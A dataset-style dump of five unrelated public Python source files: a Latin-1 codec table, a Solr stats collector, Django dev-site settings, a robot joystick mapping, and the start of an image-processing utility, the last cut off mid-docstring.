repo_name | ref | path | copies | content
---|---|---|---|---|
MarishaYasko/interactive-stories-stands
|
refs/heads/master
|
InteractiveStands/Lib/encodings/iso8859_1.py
|
266
|
""" Python Character Mapping Codec iso8859_1 generated from 'MAPPINGS/ISO8859/8859-1.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='iso8859-1',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
'\x00' # 0x00 -> NULL
'\x01' # 0x01 -> START OF HEADING
'\x02' # 0x02 -> START OF TEXT
'\x03' # 0x03 -> END OF TEXT
'\x04' # 0x04 -> END OF TRANSMISSION
'\x05' # 0x05 -> ENQUIRY
'\x06' # 0x06 -> ACKNOWLEDGE
'\x07' # 0x07 -> BELL
'\x08' # 0x08 -> BACKSPACE
'\t' # 0x09 -> HORIZONTAL TABULATION
'\n' # 0x0A -> LINE FEED
'\x0b' # 0x0B -> VERTICAL TABULATION
'\x0c' # 0x0C -> FORM FEED
'\r' # 0x0D -> CARRIAGE RETURN
'\x0e' # 0x0E -> SHIFT OUT
'\x0f' # 0x0F -> SHIFT IN
'\x10' # 0x10 -> DATA LINK ESCAPE
'\x11' # 0x11 -> DEVICE CONTROL ONE
'\x12' # 0x12 -> DEVICE CONTROL TWO
'\x13' # 0x13 -> DEVICE CONTROL THREE
'\x14' # 0x14 -> DEVICE CONTROL FOUR
'\x15' # 0x15 -> NEGATIVE ACKNOWLEDGE
'\x16' # 0x16 -> SYNCHRONOUS IDLE
'\x17' # 0x17 -> END OF TRANSMISSION BLOCK
'\x18' # 0x18 -> CANCEL
'\x19' # 0x19 -> END OF MEDIUM
'\x1a' # 0x1A -> SUBSTITUTE
'\x1b' # 0x1B -> ESCAPE
'\x1c' # 0x1C -> FILE SEPARATOR
'\x1d' # 0x1D -> GROUP SEPARATOR
'\x1e' # 0x1E -> RECORD SEPARATOR
'\x1f' # 0x1F -> UNIT SEPARATOR
' ' # 0x20 -> SPACE
'!' # 0x21 -> EXCLAMATION MARK
'"' # 0x22 -> QUOTATION MARK
'#' # 0x23 -> NUMBER SIGN
'$' # 0x24 -> DOLLAR SIGN
'%' # 0x25 -> PERCENT SIGN
'&' # 0x26 -> AMPERSAND
"'" # 0x27 -> APOSTROPHE
'(' # 0x28 -> LEFT PARENTHESIS
')' # 0x29 -> RIGHT PARENTHESIS
'*' # 0x2A -> ASTERISK
'+' # 0x2B -> PLUS SIGN
',' # 0x2C -> COMMA
'-' # 0x2D -> HYPHEN-MINUS
'.' # 0x2E -> FULL STOP
'/' # 0x2F -> SOLIDUS
'0' # 0x30 -> DIGIT ZERO
'1' # 0x31 -> DIGIT ONE
'2' # 0x32 -> DIGIT TWO
'3' # 0x33 -> DIGIT THREE
'4' # 0x34 -> DIGIT FOUR
'5' # 0x35 -> DIGIT FIVE
'6' # 0x36 -> DIGIT SIX
'7' # 0x37 -> DIGIT SEVEN
'8' # 0x38 -> DIGIT EIGHT
'9' # 0x39 -> DIGIT NINE
':' # 0x3A -> COLON
';' # 0x3B -> SEMICOLON
'<' # 0x3C -> LESS-THAN SIGN
'=' # 0x3D -> EQUALS SIGN
'>' # 0x3E -> GREATER-THAN SIGN
'?' # 0x3F -> QUESTION MARK
'@' # 0x40 -> COMMERCIAL AT
'A' # 0x41 -> LATIN CAPITAL LETTER A
'B' # 0x42 -> LATIN CAPITAL LETTER B
'C' # 0x43 -> LATIN CAPITAL LETTER C
'D' # 0x44 -> LATIN CAPITAL LETTER D
'E' # 0x45 -> LATIN CAPITAL LETTER E
'F' # 0x46 -> LATIN CAPITAL LETTER F
'G' # 0x47 -> LATIN CAPITAL LETTER G
'H' # 0x48 -> LATIN CAPITAL LETTER H
'I' # 0x49 -> LATIN CAPITAL LETTER I
'J' # 0x4A -> LATIN CAPITAL LETTER J
'K' # 0x4B -> LATIN CAPITAL LETTER K
'L' # 0x4C -> LATIN CAPITAL LETTER L
'M' # 0x4D -> LATIN CAPITAL LETTER M
'N' # 0x4E -> LATIN CAPITAL LETTER N
'O' # 0x4F -> LATIN CAPITAL LETTER O
'P' # 0x50 -> LATIN CAPITAL LETTER P
'Q' # 0x51 -> LATIN CAPITAL LETTER Q
'R' # 0x52 -> LATIN CAPITAL LETTER R
'S' # 0x53 -> LATIN CAPITAL LETTER S
'T' # 0x54 -> LATIN CAPITAL LETTER T
'U' # 0x55 -> LATIN CAPITAL LETTER U
'V' # 0x56 -> LATIN CAPITAL LETTER V
'W' # 0x57 -> LATIN CAPITAL LETTER W
'X' # 0x58 -> LATIN CAPITAL LETTER X
'Y' # 0x59 -> LATIN CAPITAL LETTER Y
'Z' # 0x5A -> LATIN CAPITAL LETTER Z
'[' # 0x5B -> LEFT SQUARE BRACKET
'\\' # 0x5C -> REVERSE SOLIDUS
']' # 0x5D -> RIGHT SQUARE BRACKET
'^' # 0x5E -> CIRCUMFLEX ACCENT
'_' # 0x5F -> LOW LINE
'`' # 0x60 -> GRAVE ACCENT
'a' # 0x61 -> LATIN SMALL LETTER A
'b' # 0x62 -> LATIN SMALL LETTER B
'c' # 0x63 -> LATIN SMALL LETTER C
'd' # 0x64 -> LATIN SMALL LETTER D
'e' # 0x65 -> LATIN SMALL LETTER E
'f' # 0x66 -> LATIN SMALL LETTER F
'g' # 0x67 -> LATIN SMALL LETTER G
'h' # 0x68 -> LATIN SMALL LETTER H
'i' # 0x69 -> LATIN SMALL LETTER I
'j' # 0x6A -> LATIN SMALL LETTER J
'k' # 0x6B -> LATIN SMALL LETTER K
'l' # 0x6C -> LATIN SMALL LETTER L
'm' # 0x6D -> LATIN SMALL LETTER M
'n' # 0x6E -> LATIN SMALL LETTER N
'o' # 0x6F -> LATIN SMALL LETTER O
'p' # 0x70 -> LATIN SMALL LETTER P
'q' # 0x71 -> LATIN SMALL LETTER Q
'r' # 0x72 -> LATIN SMALL LETTER R
's' # 0x73 -> LATIN SMALL LETTER S
't' # 0x74 -> LATIN SMALL LETTER T
'u' # 0x75 -> LATIN SMALL LETTER U
'v' # 0x76 -> LATIN SMALL LETTER V
'w' # 0x77 -> LATIN SMALL LETTER W
'x' # 0x78 -> LATIN SMALL LETTER X
'y' # 0x79 -> LATIN SMALL LETTER Y
'z' # 0x7A -> LATIN SMALL LETTER Z
'{' # 0x7B -> LEFT CURLY BRACKET
'|' # 0x7C -> VERTICAL LINE
'}' # 0x7D -> RIGHT CURLY BRACKET
'~' # 0x7E -> TILDE
'\x7f' # 0x7F -> DELETE
'\x80' # 0x80 -> <control>
'\x81' # 0x81 -> <control>
'\x82' # 0x82 -> <control>
'\x83' # 0x83 -> <control>
'\x84' # 0x84 -> <control>
'\x85' # 0x85 -> <control>
'\x86' # 0x86 -> <control>
'\x87' # 0x87 -> <control>
'\x88' # 0x88 -> <control>
'\x89' # 0x89 -> <control>
'\x8a' # 0x8A -> <control>
'\x8b' # 0x8B -> <control>
'\x8c' # 0x8C -> <control>
'\x8d' # 0x8D -> <control>
'\x8e' # 0x8E -> <control>
'\x8f' # 0x8F -> <control>
'\x90' # 0x90 -> <control>
'\x91' # 0x91 -> <control>
'\x92' # 0x92 -> <control>
'\x93' # 0x93 -> <control>
'\x94' # 0x94 -> <control>
'\x95' # 0x95 -> <control>
'\x96' # 0x96 -> <control>
'\x97' # 0x97 -> <control>
'\x98' # 0x98 -> <control>
'\x99' # 0x99 -> <control>
'\x9a' # 0x9A -> <control>
'\x9b' # 0x9B -> <control>
'\x9c' # 0x9C -> <control>
'\x9d' # 0x9D -> <control>
'\x9e' # 0x9E -> <control>
'\x9f' # 0x9F -> <control>
'\xa0' # 0xA0 -> NO-BREAK SPACE
'\xa1' # 0xA1 -> INVERTED EXCLAMATION MARK
'\xa2' # 0xA2 -> CENT SIGN
'\xa3' # 0xA3 -> POUND SIGN
'\xa4' # 0xA4 -> CURRENCY SIGN
'\xa5' # 0xA5 -> YEN SIGN
'\xa6' # 0xA6 -> BROKEN BAR
'\xa7' # 0xA7 -> SECTION SIGN
'\xa8' # 0xA8 -> DIAERESIS
'\xa9' # 0xA9 -> COPYRIGHT SIGN
'\xaa' # 0xAA -> FEMININE ORDINAL INDICATOR
'\xab' # 0xAB -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
'\xac' # 0xAC -> NOT SIGN
'\xad' # 0xAD -> SOFT HYPHEN
'\xae' # 0xAE -> REGISTERED SIGN
'\xaf' # 0xAF -> MACRON
'\xb0' # 0xB0 -> DEGREE SIGN
'\xb1' # 0xB1 -> PLUS-MINUS SIGN
'\xb2' # 0xB2 -> SUPERSCRIPT TWO
'\xb3' # 0xB3 -> SUPERSCRIPT THREE
'\xb4' # 0xB4 -> ACUTE ACCENT
'\xb5' # 0xB5 -> MICRO SIGN
'\xb6' # 0xB6 -> PILCROW SIGN
'\xb7' # 0xB7 -> MIDDLE DOT
'\xb8' # 0xB8 -> CEDILLA
'\xb9' # 0xB9 -> SUPERSCRIPT ONE
'\xba' # 0xBA -> MASCULINE ORDINAL INDICATOR
'\xbb' # 0xBB -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
'\xbc' # 0xBC -> VULGAR FRACTION ONE QUARTER
'\xbd' # 0xBD -> VULGAR FRACTION ONE HALF
'\xbe' # 0xBE -> VULGAR FRACTION THREE QUARTERS
'\xbf' # 0xBF -> INVERTED QUESTION MARK
'\xc0' # 0xC0 -> LATIN CAPITAL LETTER A WITH GRAVE
'\xc1' # 0xC1 -> LATIN CAPITAL LETTER A WITH ACUTE
'\xc2' # 0xC2 -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX
'\xc3' # 0xC3 -> LATIN CAPITAL LETTER A WITH TILDE
'\xc4' # 0xC4 -> LATIN CAPITAL LETTER A WITH DIAERESIS
'\xc5' # 0xC5 -> LATIN CAPITAL LETTER A WITH RING ABOVE
'\xc6' # 0xC6 -> LATIN CAPITAL LETTER AE
'\xc7' # 0xC7 -> LATIN CAPITAL LETTER C WITH CEDILLA
'\xc8' # 0xC8 -> LATIN CAPITAL LETTER E WITH GRAVE
'\xc9' # 0xC9 -> LATIN CAPITAL LETTER E WITH ACUTE
'\xca' # 0xCA -> LATIN CAPITAL LETTER E WITH CIRCUMFLEX
'\xcb' # 0xCB -> LATIN CAPITAL LETTER E WITH DIAERESIS
'\xcc' # 0xCC -> LATIN CAPITAL LETTER I WITH GRAVE
'\xcd' # 0xCD -> LATIN CAPITAL LETTER I WITH ACUTE
'\xce' # 0xCE -> LATIN CAPITAL LETTER I WITH CIRCUMFLEX
'\xcf' # 0xCF -> LATIN CAPITAL LETTER I WITH DIAERESIS
'\xd0' # 0xD0 -> LATIN CAPITAL LETTER ETH (Icelandic)
'\xd1' # 0xD1 -> LATIN CAPITAL LETTER N WITH TILDE
'\xd2' # 0xD2 -> LATIN CAPITAL LETTER O WITH GRAVE
'\xd3' # 0xD3 -> LATIN CAPITAL LETTER O WITH ACUTE
'\xd4' # 0xD4 -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
'\xd5' # 0xD5 -> LATIN CAPITAL LETTER O WITH TILDE
'\xd6' # 0xD6 -> LATIN CAPITAL LETTER O WITH DIAERESIS
'\xd7' # 0xD7 -> MULTIPLICATION SIGN
'\xd8' # 0xD8 -> LATIN CAPITAL LETTER O WITH STROKE
'\xd9' # 0xD9 -> LATIN CAPITAL LETTER U WITH GRAVE
'\xda' # 0xDA -> LATIN CAPITAL LETTER U WITH ACUTE
'\xdb' # 0xDB -> LATIN CAPITAL LETTER U WITH CIRCUMFLEX
'\xdc' # 0xDC -> LATIN CAPITAL LETTER U WITH DIAERESIS
'\xdd' # 0xDD -> LATIN CAPITAL LETTER Y WITH ACUTE
'\xde' # 0xDE -> LATIN CAPITAL LETTER THORN (Icelandic)
'\xdf' # 0xDF -> LATIN SMALL LETTER SHARP S (German)
'\xe0' # 0xE0 -> LATIN SMALL LETTER A WITH GRAVE
'\xe1' # 0xE1 -> LATIN SMALL LETTER A WITH ACUTE
'\xe2' # 0xE2 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
'\xe3' # 0xE3 -> LATIN SMALL LETTER A WITH TILDE
'\xe4' # 0xE4 -> LATIN SMALL LETTER A WITH DIAERESIS
'\xe5' # 0xE5 -> LATIN SMALL LETTER A WITH RING ABOVE
'\xe6' # 0xE6 -> LATIN SMALL LETTER AE
'\xe7' # 0xE7 -> LATIN SMALL LETTER C WITH CEDILLA
'\xe8' # 0xE8 -> LATIN SMALL LETTER E WITH GRAVE
'\xe9' # 0xE9 -> LATIN SMALL LETTER E WITH ACUTE
'\xea' # 0xEA -> LATIN SMALL LETTER E WITH CIRCUMFLEX
'\xeb' # 0xEB -> LATIN SMALL LETTER E WITH DIAERESIS
'\xec' # 0xEC -> LATIN SMALL LETTER I WITH GRAVE
'\xed' # 0xED -> LATIN SMALL LETTER I WITH ACUTE
'\xee' # 0xEE -> LATIN SMALL LETTER I WITH CIRCUMFLEX
'\xef' # 0xEF -> LATIN SMALL LETTER I WITH DIAERESIS
'\xf0' # 0xF0 -> LATIN SMALL LETTER ETH (Icelandic)
'\xf1' # 0xF1 -> LATIN SMALL LETTER N WITH TILDE
'\xf2' # 0xF2 -> LATIN SMALL LETTER O WITH GRAVE
'\xf3' # 0xF3 -> LATIN SMALL LETTER O WITH ACUTE
'\xf4' # 0xF4 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
'\xf5' # 0xF5 -> LATIN SMALL LETTER O WITH TILDE
'\xf6' # 0xF6 -> LATIN SMALL LETTER O WITH DIAERESIS
'\xf7' # 0xF7 -> DIVISION SIGN
'\xf8' # 0xF8 -> LATIN SMALL LETTER O WITH STROKE
'\xf9' # 0xF9 -> LATIN SMALL LETTER U WITH GRAVE
'\xfa' # 0xFA -> LATIN SMALL LETTER U WITH ACUTE
'\xfb' # 0xFB -> LATIN SMALL LETTER U WITH CIRCUMFLEX
'\xfc' # 0xFC -> LATIN SMALL LETTER U WITH DIAERESIS
'\xfd' # 0xFD -> LATIN SMALL LETTER Y WITH ACUTE
'\xfe' # 0xFE -> LATIN SMALL LETTER THORN (Icelandic)
'\xff' # 0xFF -> LATIN SMALL LETTER Y WITH DIAERESIS
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
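# Usage sketch (not part of the generated module; illustrative only): ISO
# 8859-1 maps every byte 0x00-0xFF to the Unicode code point with the same
# value, so encoding and decoding round-trip for any Latin-1 text.
if __name__ == '__main__':
    _info = getregentry()
    _raw = _info.encode('caf\xe9')[0]       # charmap_encode returns (bytes, length)
    assert _raw == b'caf\xe9'
    assert _info.decode(_raw)[0] == 'caf\xe9'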
|
TinLe/Diamond
|
refs/heads/master
|
src/collectors/solr/solr.py
|
29
|
# coding=utf-8
"""
Collect the solr stats for the local node
#### Dependencies
* posixpath
* urllib2
* json
"""
import posixpath
import urllib2
try:
import json
except ImportError:
import simplejson as json
import diamond.collector
class SolrCollector(diamond.collector.Collector):
def get_default_config_help(self):
config_help = super(SolrCollector, self).get_default_config_help()
config_help.update({
'host': "",
'port': "",
'core': "Which core info should collect (default: all cores)",
'stats': "Available stats: \n"
" - core (Core stats)\n"
" - response (Ping response stats)\n"
" - query (Query Handler stats)\n"
" - update (Update Handler stats)\n"
" - cache (fieldValue, filter,"
" document & queryResult cache stats)\n"
" - jvm (JVM information) \n"
})
return config_help
def get_default_config(self):
"""
Returns the default collector settings
"""
config = super(SolrCollector, self).get_default_config()
config.update({
'host': 'localhost',
'port': 8983,
'path': 'solr',
'core': None,
'stats': ['jvm', 'core', 'response',
'query', 'update', 'cache'],
})
return config
def _try_convert(self, value):
if isinstance(value, (int, float)):
return value
try:
if '.' in value:
return float(value)
return int(value)
except ValueError:
return value
def _get(self, path):
url = 'http://%s:%i/%s' % (
self.config['host'], int(self.config['port']), path)
try:
response = urllib2.urlopen(url)
except Exception as err:
self.log.error("%s: %s", url, err)
return False
try:
return json.load(response)
except (TypeError, ValueError):
self.log.error("Unable to parse response from solr as a"
" json object")
return False
def collect(self):
if json is None:
self.log.error('Unable to import json')
return {}
cores = []
if self.config['core']:
cores = [self.config['core']]
else:
# If no core is specified, provide statistics for all cores
result = self._get('/solr/admin/cores?action=STATUS&wt=json')
if result:
cores = result['status'].keys()
metrics = {}
for core in cores:
if core:
path = "{0}.".format(core)
else:
path = ""
ping_url = posixpath.normpath(
"/solr/{0}/admin/ping?wt=json".format(core))
if 'response' in self.config['stats']:
result = self._get(ping_url)
if not result:
continue
metrics.update({
"{0}response.QueryTime".format(path):
result["responseHeader"]["QTime"],
"{0}response.Status".format(path):
result["responseHeader"]["status"],
})
stats_url = posixpath.normpath(
"/solr/{0}/admin/mbeans?stats=true&wt=json".format(core))
result = self._get(stats_url)
if not result:
continue
s = result['solr-mbeans']
stats = dict((s[i], s[i+1]) for i in xrange(0, len(s), 2))
if 'core' in self.config['stats']:
core_searcher = stats["CORE"]["searcher"]["stats"]
metrics.update([
("{0}core.{1}".format(path, key),
core_searcher[key])
for key in ("maxDoc", "numDocs", "warmupTime")
])
if 'query' in self.config['stats']:
standard = stats["QUERYHANDLER"]["standard"]["stats"]
update = stats["QUERYHANDLER"]["/update"]["stats"]
metrics.update([
("{0}queryhandler.standard.{1}".format(path, key),
standard[key])
for key in ("requests", "errors", "timeouts", "totalTime",
"avgTimePerRequest", "avgRequestsPerSecond")
])
metrics.update([
("{0}queryhandler.update.{1}".format(path, key),
update[key])
for key in ("requests", "errors", "timeouts", "totalTime",
"avgTimePerRequest", "avgRequestsPerSecond")
if update[key] != 'NaN'
])
if 'update' in self.config['stats']:
updatehandler = \
stats["UPDATEHANDLER"]["updateHandler"]["stats"]
metrics.update([
("{0}updatehandler.{1}".format(path, key),
updatehandler[key])
for key in (
"commits", "autocommits", "optimizes",
"rollbacks", "docsPending", "adds", "errors",
"cumulative_adds", "cumulative_errors")
])
if 'cache' in self.config['stats']:
cache = stats["CACHE"]
metrics.update([
("{0}cache.{1}.{2}".format(path, cache_type, key),
self._try_convert(cache[cache_type]['stats'][key]))
for cache_type in (
'fieldValueCache', 'filterCache',
'documentCache', 'queryResultCache')
for key in (
'lookups', 'hits', 'hitratio', 'inserts',
'evictions', 'size', 'warmupTime',
'cumulative_lookups', 'cumulative_hits',
'cumulative_hitratio', 'cumulative_inserts',
'cumulative_evictions')
])
if 'jvm' in self.config['stats']:
system_url = posixpath.normpath(
"/solr/{0}/admin/system?stats=true&wt=json".format(core))
result = self._get(system_url)
if not result:
continue
mem = result['jvm']['memory']
metrics.update([
('{0}jvm.mem.{1}'.format(path, key),
self._try_convert(mem[key].split()[0]))
for key in ('free', 'total', 'max', 'used')
])
for key in metrics:
self.publish(key, metrics[key])
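# Illustration (not part of the collector; values are hypothetical): Solr's
# mbeans handler returns a flat list that alternates category names and stat
# dicts, which collect() folds into a dict, e.g.
#
#     s = ['CORE', {'searcher': {'stats': {'numDocs': 10}}},
#          'CACHE', {'filterCache': {'stats': {'hits': 5}}}]
#     stats = dict((s[i], s[i + 1]) for i in xrange(0, len(s), 2))
#     # stats['CORE']['searcher']['stats']['numDocs'] == 10
#
# Published metric keys then look like 'core1.core.numDocs' or
# 'core1.cache.filterCache.hits' once the core name prefix is applied.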
|
clouserw/olympia
|
refs/heads/master
|
sites/altdev/settings_base.py
|
1
|
"""private_base will be populated from puppet and placed in this directory"""
import logging
import os
import dj_database_url
from lib.settings_base import CACHE_PREFIX, ES_INDEXES, KNOWN_PROXIES, LOGGING
from .. import splitstrip
import private_base as private
ENGAGE_ROBOTS = False
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = private.EMAIL_HOST
DEBUG = False
TEMPLATE_DEBUG = DEBUG
DEBUG_PROPAGATE_EXCEPTIONS = False
SESSION_COOKIE_SECURE = True
REDIRECT_SECRET_KEY = private.REDIRECT_SECRET_KEY
ADMINS = ()
DATABASES = {}
DATABASES['default'] = dj_database_url.parse(private.DATABASES_DEFAULT_URL)
DATABASES['default']['ENGINE'] = 'mysql_pool'
DATABASES['default']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave'] = dj_database_url.parse(private.DATABASES_SLAVE_URL)
DATABASES['slave']['ENGINE'] = 'mysql_pool'
DATABASES['slave']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave']['sa_pool_key'] = 'slave'
DATABASE_POOL_ARGS = {
'max_overflow': 10,
'pool_size': 5,
'recycle': 30
}
SERVICES_DATABASE = dj_database_url.parse(private.SERVICES_DATABASE_URL)
SLAVE_DATABASES = ['slave']
CACHES = {
'default': {
'BACKEND': 'caching.backends.memcached.MemcachedCache',
'LOCATION': splitstrip(private.CACHES_DEFAULT_LOCATION),
'TIMEOUT': 500,
'KEY_PREFIX': CACHE_PREFIX,
}
}
SECRET_KEY = private.SECRET_KEY
LOG_LEVEL = logging.DEBUG
## Celery
BROKER_URL = private.BROKER_URL
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'
NETAPP_STORAGE = private.NETAPP_STORAGE_ROOT + '/shared_storage'
MIRROR_STAGE_PATH = private.NETAPP_STORAGE_ROOT + '/public-staging'
GUARDED_ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/guarded-addons'
UPLOADS_PATH = NETAPP_STORAGE + '/uploads'
USERPICS_PATH = UPLOADS_PATH + '/userpics'
ADDON_ICONS_PATH = UPLOADS_PATH + '/addon_icons'
COLLECTIONS_ICON_PATH = UPLOADS_PATH + '/collection_icons'
IMAGEASSETS_PATH = UPLOADS_PATH + '/imageassets'
REVIEWER_ATTACHMENTS_PATH = UPLOADS_PATH + '/reviewer_attachment'
PREVIEWS_PATH = UPLOADS_PATH + '/previews'
SIGNED_APPS_PATH = NETAPP_STORAGE + '/signed_apps'
SIGNED_APPS_REVIEWER_PATH = NETAPP_STORAGE + '/signed_apps_reviewer'
PREVIEW_THUMBNAIL_PATH = PREVIEWS_PATH + '/thumbs/%s/%d.png'
PREVIEW_FULL_PATH = PREVIEWS_PATH + '/full/%s/%d.%s'
HERA = []
LOGGING['loggers'].update({
'amqp': {'level': logging.WARNING},
'raven': {'level': logging.WARNING},
'requests': {'level': logging.WARNING},
'z.addons': {'level': logging.INFO},
'z.task': { 'level': logging.DEBUG },
'z.hera': { 'level': logging.INFO },
'z.redis': { 'level': logging.DEBUG },
'z.pool': { 'level': logging.ERROR },
})
REDIS_BACKEND = private.REDIS_BACKENDS_CACHE
REDIS_BACKENDS = {
'cache': private.REDIS_BACKENDS_CACHE,
'cache_slave': private.REDIS_BACKENDS_CACHE_SLAVE,
'master': private.REDIS_BACKENDS_MASTER,
'slave': private.REDIS_BACKENDS_SLAVE,
}
CACHE_MACHINE_USE_REDIS = True
RECAPTCHA_PUBLIC_KEY = private.RECAPTCHA_PUBLIC_KEY
RECAPTCHA_PRIVATE_KEY = private.RECAPTCHA_PRIVATE_KEY
RECAPTCHA_URL = ('https://www.google.com/recaptcha/api/challenge?k=%s' %
RECAPTCHA_PUBLIC_KEY)
TMP_PATH = os.path.join(NETAPP_STORAGE, 'tmp')
PACKAGER_PATH = os.path.join(TMP_PATH, 'packager')
ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/files'
PERF_THRESHOLD = 20
SPIDERMONKEY = '/usr/bin/tracemonkey'
# Remove DetectMobileMiddleware from middleware in production.
detect = 'mobility.middleware.DetectMobileMiddleware'
csp = 'csp.middleware.CSPMiddleware'
RESPONSYS_ID = private.RESPONSYS_ID
CRONJOB_LOCK_PREFIX = 'marketplace-altdev'
BUILDER_SECRET_KEY = private.BUILDER_SECRET_KEY
BUILDER_VERSIONS_URL = "https://builder-addons-dev.allizom.org/repackage/sdk-versions/"
ES_HOSTS = splitstrip(private.ES_HOSTS)
ES_URLS = ['http://%s' % h for h in ES_HOSTS]
ES_INDEXES = dict((k, '%s_altdev' % v) for k, v in ES_INDEXES.items())
BUILDER_UPGRADE_URL = "https://builder-addons-dev.allizom.org/repackage/rebuild/"
STATSD_HOST = private.STATSD_HOST
STATSD_PORT = private.STATSD_PORT
STATSD_PREFIX = private.STATSD_PREFIX
GRAPHITE_HOST = private.GRAPHITE_HOST
GRAPHITE_PORT = private.GRAPHITE_PORT
GRAPHITE_PREFIX = private.GRAPHITE_PREFIX
CEF_PRODUCT = STATSD_PREFIX
ES_TIMEOUT = 60
EXPOSE_VALIDATOR_TRACEBACKS = True
KNOWN_PROXIES += ['10.2.83.105',
'10.2.83.106',
'10.2.83.107',
'10.8.83.200',
'10.8.83.201',
'10.8.83.202',
'10.8.83.203',
'10.8.83.204',
'10.8.83.210',
'10.8.83.211',
'10.8.83.212',
'10.8.83.213',
'10.8.83.214',
'10.8.83.215',
'10.8.83.251',
'10.8.83.252',
'10.8.83.253',
]
NEW_FEATURES = True
PERF_TEST_URL = 'http://talos-addon-master1.amotest.scl1.mozilla.com/trigger/trigger.cgi'
REDIRECT_URL = 'https://outgoing.allizom.org/v1/'
CLEANCSS_BIN = 'cleancss'
UGLIFY_BIN = 'uglifyjs'
CELERYD_TASK_SOFT_TIME_LIMIT = 240
LESS_PREPROCESS = True
XSENDFILE_HEADER = 'X-Accel-Redirect'
ALLOW_SELF_REVIEWS = True
GOOGLE_ANALYTICS_CREDENTIALS = private.GOOGLE_ANALYTICS_CREDENTIALS
GOOGLE_API_CREDENTIALS = private.GOOGLE_API_CREDENTIALS
GEOIP_URL = 'http://geo-dev.marketplace.allizom.org'
AWS_ACCESS_KEY_ID = private.AWS_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY = private.AWS_SECRET_ACCESS_KEY
AWS_STORAGE_BUCKET_NAME = private.AWS_STORAGE_BUCKET_NAME
RAISE_ON_SIGNAL_ERROR = True
API_THROTTLE = False
AES_KEYS = private.AES_KEYS
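# Note (assumption about the dj_database_url library, not about this settings
# file): dj_database_url.parse() turns a single URL into the usual Django
# DATABASES dict, roughly:
#
#     dj_database_url.parse('mysql://user:secret@db.example.com:3306/olympia')
#     # -> {'ENGINE': 'django.db.backends.mysql', 'NAME': 'olympia',
#     #     'USER': 'user', 'PASSWORD': 'secret',
#     #     'HOST': 'db.example.com', 'PORT': 3306}
#
# which the settings above then override with the 'mysql_pool' engine and the
# InnoDB init command.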
|
Firebird1915/FRC2015PY
|
refs/heads/master
|
oi.py
|
4
|
import wpilib
from wpilib import SmartDashboard
from wpilib.buttons import JoystickButton
#import subsystems
from subsystems.drivetrain import DriveTrain
from subsystems.lift import LiftMech
from subsystems.pneumatics_comp import Pneumatics
#import commands
from commands.speed_toggle import SpeedToggle
from commands.pull_intake import PullIntake
from commands.lift_arm import MoveArm
from commands.armup import armUp
class OI:
def __init__(self, robot):
#Xbox controller
self.joy = wpilib.Joystick(0)
#Actual Joystick
self.joy_lift = wpilib.Joystick(1)
#Buttons for Xbox controller
self.r_trig = JoystickButton(self.joy, 6) #I think
#buttons for actual joystick
self.btn3 = JoystickButton(self.joy_lift, 3)
#self.btn4 = JoystickButton(self.joy_lift, 4)
self.btn7 = JoystickButton(self.joy_lift, 7)
#bind buttons on Xbox controller to commands
self.r_trig.toggleWhenPressed(SpeedToggle(robot.pneumatics_comp))
#bind buttons on Joystick to commands
# self.btn3.whileHeld(PullIntake(robot.intake))
self.btn7.whenPressed(armUp(robot.lift))
#self.btn3.whenPressed(PullIntake(Intake))
def getJoystick(self):
return self.joy
def getLiftstick(self):
return self.joy_lift
|
kenshay/ImageScripter
|
refs/heads/master
|
ProgramData/Android/ADB/platform-tools/systrace/catapult/telemetry/telemetry/util/image_util.py
|
31
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Provides implementations of basic image processing functions.
Implements basic image processing functions, such as reading/writing images,
cropping, finding the bounding box of a color and diffing images.
When numpy is present, image_util_numpy_impl is used for the implementation of
this interface. The old bitmap implementation (image_util_bitmap_impl) is used
as a fallback when numpy is not present."""
import base64
from telemetry.internal.util import external_modules
np = external_modules.ImportOptionalModule('numpy')
if np is None:
from telemetry.internal.image_processing import image_util_bitmap_impl
impl = image_util_bitmap_impl
else:
from telemetry.internal.image_processing import image_util_numpy_impl
impl = image_util_numpy_impl
def Channels(image):
"""Number of color channels in the image."""
return impl.Channels(image)
def Width(image):
"""Width of the image."""
return impl.Width(image)
def Height(image):
"""Height of the image."""
return impl.Height(image)
def Pixels(image):
"""Flat RGB pixel array of the image."""
return impl.Pixels(image)
def GetPixelColor(image, x, y):
"""Returns a RgbaColor for the pixel at (x, y)."""
return impl.GetPixelColor(image, x, y)
def WritePngFile(image, path):
"""Write an image to a PNG file.
Args:
image: an image object.
path: The path to the PNG file. Must end in 'png' or an
AssertionError will be raised."""
assert path.endswith('png')
return impl.WritePngFile(image, path)
def FromRGBPixels(width, height, pixels, bpp=3):
"""Create an image from an array of rgb pixels.
Ignores alpha channel if present.
Args:
width, height: int, the width and height of the image.
